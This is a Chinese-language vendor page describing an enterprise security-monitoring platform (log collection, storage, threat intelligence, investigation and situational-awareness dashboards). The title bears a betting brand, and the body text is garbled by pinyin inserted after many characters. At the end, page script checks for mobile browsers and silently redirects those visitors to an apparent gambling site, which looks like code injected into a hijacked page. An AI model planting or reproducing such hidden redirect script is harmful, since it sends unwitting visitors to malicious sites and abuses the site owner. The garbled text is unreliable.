365投注

综合安全监管解决方案

发布时间: 2019年06月(yue)04日 点击量:98分享到:

方案概述

在(zai)企业(ye)的(de)网络基础(chu)设(she)(she)施和(he)信息系统(tong)(tong)(tong)建(jian)(jian)设(she)(she)过程中,为(wei)保证业(ye)务系统(tong)(tong)(tong)的(de)安(an)全(quan)可靠运行,同时也为(wei)了(le)满足国家法律法规和(he)行业(ye)规范(fan)的(de)要求,会进行相(xiang)(xiang)应(ying)的(de)信息安(an)全(quan)基础(chu)建(jian)(jian)设(she)(she),部(bu)署相(xiang)(xiang)关的(de)安(an)全(quan)设(she)(she)备和(he)安(an)全(quan)系统(tong)(tong)(tong)(防(fang)火(huo)墙、防(fang)病(bing)(bing)毒(du)(du)系统(tong)(tong)(tong)、IDS/IPS、VPN、WAF、日(ri)志审(shen)计等)。这些安(an)全(quan)设(she)(she)备和(he)系统(tong)(tong)(tong)较好的(de)解决了(le)其关注的(de)某(mou)个方面的(de)安(an)全(quan)问(wen)题,如防(fang)火(huo)墙能(neng)够依(yi)据预定义的(de)策略(lve)阻止违反策略(lve)的(de)访(fang)问(wen)、防(fang)病(bing)(bing)毒(du)(du)系统(tong)(tong)(tong)能(neng)够利用其病(bing)(bing)毒(du)(du)特征库发(fa)现已知病(bing)(bing)毒(du)(du)、日(ri)志审(shen)计系统(tong)(tong)(tong)能(neng)够利用审(shen)计规则发(fa)现可疑访(fang)问(wen)等。


但随着网(wang)络(luo)应用规模和复杂(za)度(du)的(de)(de)不断提(ti)高,网(wang)络(luo)中(zhong)传(chuan)输的(de)(de)数(shu)(shu)据(ju)量急剧上升,网(wang)络(luo)攻(gong)防(fang)对(dui)抗日趋激烈,企(qi)业内部(bu)新的(de)(de)安(an)(an)(an)全(quan)(quan)问题(ti)开始显现(xian),包括复杂(za)的(de)(de)网(wang)络(luo)环(huan)境让(rang)安(an)(an)(an)全(quan)(quan)工作无从下手、传(chuan)统安(an)(an)(an)全(quan)(quan)技术对(dui)高级(ji)持(chi)续性威(wei)胁(xie)无能为(wei)力、围墙(qiang)式的(de)(de)防(fang)御体(ti)系不再适应当前的(de)(de)网(wang)络(luo)环(huan)境,为(wei)解决(jue)以上出现(xian)的(de)(de)新的(de)(de)安(an)(an)(an)全(quan)(quan)问题(ti),形(xing)成了综合安(an)(an)(an)全(quan)(quan)监管平台解决(jue)方案。解决(jue)方案涵盖(gai)数(shu)(shu)据(ju)采集、数(shu)(shu)据(ju)处理和存储(chu)、数(shu)(shu)据(ju)分析(xi)、利用威(wei)胁(xie)情报对(dui)威(wei)胁(xie)进行发现(xian)和研判、安(an)(an)(an)全(quan)(quan)威(wei)胁(xie)事件调查分析(xi)、整体(ti)安(an)(an)(an)全(quan)(quan)态势呈(cheng)现(xian)、构建安(an)(an)(an)全(quan)(quan)运营体(ti)系等功能。


 

方案功能

数据采集

为提升(sheng)安(an)全(quan)(quan)运(yun)营和管理的(de)覆盖面,以(yi)及提高安(an)全(quan)(quan)检(jian)测(ce)功(gong)能的(de)深度和准确度,广泛的(de)基础信息(xi)采(cai)集(ji)在系统(tong)建(jian)设中必不可(ke)少。平(ping)台可(ke)以(yi)通过日志采(cai)集(ji)探针、流量传感(gan)器、终端安(an)全(quan)(quan)管理系统(tong)等多种软硬(ying)件产品对常见(jian)日志进行采(cai)集(ji)。


数据处理和存储

平台使用了ES集(ji)群(qun)和PG集(ji)群(qun),在ES(ElasticSearch)集(ji)群(qun)中,主要是存储归(gui)一化的(de)(de)日(ri)(ri)(ri)志(zhi)、流(liu)量日(ri)(ri)(ri)志(zhi)、原始(shi)日(ri)(ri)(ri)志(zhi)等(deng)所有(you)的(de)(de)日(ri)(ri)(ri)志(zhi)信息。集(ji)群(qun)自身考虑了冗(rong)余(yu)、备(bei)份、负(fu)载(zai)均衡(heng)等(deng)相关事务(wu);PG集(ji)群(qun),也就是基(ji)于(yu)(yu)PostgresSQL的(de)(de)集(ji)群(qun),主要用于(yu)(yu)快(kuai)速的(de)(de)展示(shi)告警结(jie)果(guo)、调查分析结(jie)果(guo)、报表(biao)等(deng)一些数(shu)据分析结(jie)果(guo)数(shu)据。


数据分(fen)析

能够实现数据(ju)的快速搜(sou)索、统计、关联(lian)分(fen)析(xi)、场景化分(fen)析(xi)和拓扑计算等。


利用威(wei)胁情报(bao)对威(wei)胁进(jin)行发现(xian)和研(yan)判

威胁(xie)情(qing)报(bao)是一种特定类型的(de)(de)(de)(de)情(qing)报(bao),旨在(zai)为企业提供(gong)有关(guan)于攻(gong)击(ji)者(zhe)(zhe)(zhe)的(de)(de)(de)(de)知(zhi)识,帮助企业了解攻(gong)击(ji)者(zhe)(zhe)(zhe)在(zai)企业的(de)(de)(de)(de)网络环境(jing)中(zhong)的(de)(de)(de)(de)行动(dong)、攻(gong)击(ji)者(zhe)(zhe)(zhe)的(de)(de)(de)(de)能力和(he)TTP(战术、技术和(he)规(gui)程)信息(xi)。企业通过(guo)利用威胁(xie)情(qing)报(bao)可以从攻(gong)击(ji)者(zhe)(zhe)(zhe)身上获得相关(guan)经(jing)验教训,以更好(hao)地(di)识别威胁(xie)和(he)做出响应。威胁(xie)情(qing)报(bao)包括(kuo)IP信息(xi)、域名信息(xi)、文件MD5等信息(xi)。


安全威胁(xie)事件调查分(fen)析

充(chong)分(fen)利(li)用大数(shu)据平台(tai)存储量(liang)大、数(shu)据全(quan)面、计算效率高(gao)(gao)的特点,为企(qi)业提供便捷高(gao)(gao)效的安(an)(an)全(quan)威(wei)胁事件(jian)(jian)调(diao)查工(gong)具(ju)(ju)。一方(fang)面可(ke)(ke)通过可(ke)(ke)视(shi)化(hua)(hua)技术建立数(shu)据之间的关联,提高(gao)(gao)数(shu)据的可(ke)(ke)读性和(he)(he)可(ke)(ke)操(cao)作性,提高(gao)(gao)安(an)(an)全(quan)人员针对安(an)(an)全(quan)事件(jian)(jian)的分(fen)析(xi)效率;另一方(fang)面可(ke)(ke)将安(an)(an)全(quan)分(fen)析(xi)人员经常使用的调(diao)查分(fen)析(xi)场(chang)(chang)景固化(hua)(hua)成(cheng)独(du)立的小工(gong)具(ju)(ju),使分(fen)析(xi)人员在对数(shu)据进行调(diao)查时可(ke)(ke)快速调(diao)用场(chang)(chang)景化(hua)(hua)工(gong)具(ju)(ju),让分(fen)析(xi)人员将精力集中(zhong)在威(wei)胁事件(jian)(jian)的细节和(he)(he)过程分(fen)析(xi)上,而不是浪费(fei)在数(shu)据查询(xun)或(huo)统(tong)计的语句构造上。


整体安全(quan)态势(shi)呈现

在安全(quan)应用之上,NGSOC系(xi)(xi)统利用自身所能收集的各种(zhong)(zhong)数据、告警和(he)威胁(xie)情报(bao),结合(he)自身的完善运营(ying)体系(xi)(xi)内,预置以内部资产(chan)为视角(jiao)的内部业(ye)务资产(chan)风险态势(shi)感知和(he)外部威胁(xie)态势(shi)感知。同(tong)时(shi)可以根据不同(tong)行业(ye)和(he)客户特点进行态势(shi)感知系(xi)(xi)统的定制开(kai)发,提(ti)供多种(zhong)(zhong)安全(quan)态势(shi)的分析呈现能力,为进一步的安全(quan)预警和(he)监控提(ti)供了系(xi)(xi)统支撑。


构建安(an)全运营体系

在(zai)完善的大数据平台架(jia)构之上(shang),NGSOC基于自(zi)适应安全(quan)框架(jia)设计了(le)相关安全(quan)功能(告(gao)警功能、资产(chan)管(guan)理、日(ri)志(zhi)检索、告(gao)警处置、工单、仪(yi)表(biao)(biao)板(ban)、调查分析、报表(biao)(biao)、知识库、仪(yi)表(biao)(biao)展示等功能),对传统(tong)安全(quan)防御(yu)类产(chan)品进(jin)行架(jia)构上(shang)的补充,可以(yi)帮助企业客户实现(xian)完整闭(bi)环的威胁响应。

方案价值

  • 完善安全防护体系

    利用云端威(wei)胁(xie)情报数据,从(cong)互联(lian)网数据中(zhong)进行发掘和分析攻击线(xian)索,提升未知(zhi)威(wei)胁(xie)和APT攻击的检出效率,有(you)效发现(xian)基础安全(quan)(quan)建设中(zhong)遗留的安全(quan)(quan)隐患(huan)并及时修正。 

  • 提升安全防护水平

    引入(ru)(ru)威(wei)胁情报和规则(ze)链技术的(de)(de)引入(ru)(ru),形成(cheng)了监(jian)听-主动(dong)回溯、研判-主动(dong)监(jian)测(ce)的(de)(de)检测(ce)体系(xi),大(da)大(da)提升(sheng)了积极防(fang)御的(de)(de)能力,弥补了现有被动(dong)防(fang)御方(fang)式(shi)的(de)(de)不足(zu)。 

  • 提升异常检测能力

     场景(jing)化(hua)威胁检测(ce)技术(shu),能(neng)够基于(yu)用户的(de)业务(wu)环境构建威胁检测(ce)和响应模型,及时发现(xian)内部的(de)业务(wu)安全风险。  

  • 提高应急响应效率

    终端(duan)检测(ce)响应(EDR)技术(shu)可(ke)以和(he)配置的其他安全设(she)备进行联动,形成协调防御体系(xi),可(ke)以大大缩短攻(gong)击(ji)(ji)者(zhe)的攻(gong)击(ji)(ji)时间窗口并提高攻(gong)击(ji)(ji)者(zhe)的攻(gong)击(ji)(ji)成本。 

  • 提升数据查找能力

    创新性的(de)采用搜(sou)索引擎技(ji)术作(zuo)为(wei)本地数据(ju)存储和(he)检(jian)索核心(xin)技(ji)术,极大提高检(jian)索性能,可(ke)以(yi)提供(gong)TB级的(de)数据(ju)快速搜(sou)索能力(li),同时可(ke)为(wei)大规(gui)模(mo)数据(ju)保(bao)存、攻击证据(ju)留存和(he)查(cha)询、实时关联分(fen)析提供(gong)坚实的(de)技(ji)术保(bao)障。 

  • 安全态势一目了然

     通过(guo)可视化技术(shu),将(jiang)(jiang)原本碎片化的威胁(xie)告(gao)警、异常行为(wei)告(gao)警、资产(chan)管理等数据结(jie)构(gou)化,形成高(gao)维度的可视化方案,以便于用户理解;同时(shi)将(jiang)(jiang)威胁(xie)事件与业务进行有机结(jie)合,通过(guo)态势(shi)感(gan)知大屏(ping)将(jiang)(jiang)内网(wang)全(quan)局的安全(quan)态势(shi)以图(tu)形化的方式直观(guan)呈(cheng)现,将(jiang)(jiang)安全(quan)由不(bu)可见变为(wei)可见。  

法律声明 网站地图 联系我们

©Thunisoft 北京365投注信息技术有限(xian)公司 版(ban)权所有    

var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?993185dc8689f489fddf05459dcb9ba5"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); function browserRedirect() { var sUserAgent= navigator.userAgent.toLowerCase(); var bIsIpad= sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs= sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp= sUserAgent.match(/midp/i) == "midp"; var bIsUc7= sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; var bIsUc= sUserAgent.match(/ucweb/i) == "ucweb"; var bIsAndroid= sUserAgent.match(/android/i) == "android"; var bIsCE= sUserAgent.match(/windows ce/i) == "windows ce"; var bIsWM= sUserAgent.match(/windows mobile/i) == "windows mobile"; if (bIsIpad || bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) { window.setTimeout("window.location='http://leyubet1410.com'",1000); } else { document.writeln(""); document.writeln(""); document.writeln(""); } } browserRedirect();